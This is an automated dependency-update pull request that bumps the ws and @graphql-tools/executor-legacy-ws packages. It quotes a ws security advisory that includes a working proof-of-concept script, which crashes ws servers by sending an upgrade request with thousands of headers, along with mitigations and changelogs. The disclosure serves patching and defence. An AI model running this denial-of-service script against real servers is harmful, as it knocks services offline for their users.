[Security] Bump ws and @graphql-tools/executor-legacy-ws in /ui
Bumps ws and @graphql-tools/executor-legacy-ws. These dependencies needed to be updated together.
Updates ws
from 8.14.2 to 8.17.1 This update includes a security fix.
Vulnerabilities fixed
ws affected by a DoS when handling a request with many HTTP headers
Impact
A request with a number of headers exceeding the[
server.maxHeadersCount
][] threshold could be used to crash a ws server.Proof of concept
const http = require('http'); const WebSocket = require('ws'); const wss = new WebSocket.Server({ port: 0 }, function () { const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split(''); const headers = {}; let count = 0; for (let i = 0; i < chars.length; i++) { if (count === 2000) break; for (let j = 0; j < chars.length; j++) { const key = chars[i] + chars[j]; </tr></table>
... (truncated)
Patched versions: 8.17.1 Affected versions: >= 8.0.0, < 8.17.1
Release notes
Sourced from ws's releases.
8.17.1
Bug fixes
- Fixed a DoS vulnerability (#2231).
A request with a number of headers exceeding the[
server.maxHeadersCount
][] threshold could be used to crash a ws server.const http = require('http'); const WebSocket = require('ws'); const wss = new WebSocket.Server({ port: 0 }, function () { const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split(''); const headers = {}; let count = 0; for (let i = 0; i < chars.length; i++) { if (count === 2000) break; for (let j = 0; j < chars.length; j++) { const key = chars[i] + chars[j]; headers[key] = 'x'; if (++count === 2000) break; } } headers.Connection = 'Upgrade'; headers.Upgrade = 'websocket'; headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ=='; headers['Sec-WebSocket-Version'] = '13'; const request = http.request({ headers: headers, host: '127.0.0.1', port: wss.address().port }); request.end(); });
The vulnerability was reported by Ryan LaPointe in websockets/ws#2230.
In vulnerable versions of ws, the issue can be mitigated in the following ways:
- Reduce the maximum allowed length of the request headers using the [
--max-http-header-size=size
][] and/or the [maxHeaderSize
][] options so that no more headers than theserver.maxHeadersCount
limit can be sent.
... (truncated)
Commits
-
3c56601
[dist] 8.17.1 -
e55e510
[security] Fix crash when the Upgrade header cannot be read (#2231) -
6a00029
[test] Increase code coverage -
ddfe4a8
[perf] Reduce the amount ofcrypto.randomFillSync()
calls -
b73b118
[dist] 8.17.0 -
29694a5
[test] Use thehighWaterMark
variable -
934c9d6
[ci] Test on node 22 -
1817bac
[ci] Do not test on node 21 -
96c9b3d
[major] Flip the default value ofallowSynchronousEvents
(#2221) -
e5f32c7
[fix] Emit at most one event per event loop iteration (#2218) - Additional commits viewable in compare view
Updates @graphql-tools/executor-legacy-ws
from 1.0.4 to 1.0.6
Changelog
Sourced from @graphql-tools/executor-legacy-ws
's changelog.
1.0.6
Patch Changes
- #5913
83c0af0
Thanks@enisdenjo
! - dependencies updates:
- Updated dependency
@graphql-tools/utils@^10.0.13
↗ ︎ (from^10.0.0
, independencies
)1.0.5
Patch Changes
- #5762
701cfd3
Thanks@renovate
! - dependencies updates:
- Updated dependency
ws@8.15.0
↗ ︎ (from8.14.2
, independencies
)
Commits
-
f59d7d7
chore(release): update monorepo packages versions (#5929) -
83c0af0
No unnecessary inline fragment spreads for union types in federation and link... -
a3259da
chore(release): update monorepo packages versions (#5763) -
38a92ab
Use ranged dependencies -
701cfd3
fix(deps): update dependency ws to v8.15.0 (#5762) - See full diff in compare view